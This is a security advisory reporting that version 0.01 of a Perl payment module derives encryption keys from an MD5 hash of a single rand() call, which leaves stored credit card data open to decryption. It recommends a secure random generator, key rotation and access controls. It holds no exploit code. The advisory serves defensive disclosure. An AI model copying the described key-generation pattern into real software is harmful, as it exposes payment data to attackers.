A cryptographic weakness in secret key generation allows attackers to potentially decrypt sensitive credit card transaction data, leading to large-scale financial data exposure.

The module generates secret keys by taking an MD5 hash of a single call to the built-in rand() function. This function is not cryptographically secure and is highly predictable, making the resulting "secret" keys susceptible to brute-force or prediction attacks.

The failure of the encryption mechanism directly impacts the confidentiality of credit card transaction data. This could lead to a massive breach of PCI-DSS compliance, significant financial penalties, and loss of customer trust. The CVSS score of 9.1 underscores the critical risk associated with compromised financial data encryption.

Immediate Action: Discontinue the use of Business::OnlinePayment::StoredTransaction version 0.01. Update to a version that utilizes a cryptographically secure random number generator (CSPRNG) for key generation.

Proactive Monitoring: Audit all stored transaction data and consider rotating all encryption keys once a secure version of the module is implemented.

Compensating Controls: Implement database-level encryption and strict access controls to the stored encrypted data to provide a layer of defense-in-depth.

Public Exploit Available: No

Cryptographic integrity is the foundation of secure online payments. Using predictable keys for credit card data is a critical failure. Organizations must immediately move to a secure, patched version of the module or transition to a more robust payment processing library that adheres to modern security standards.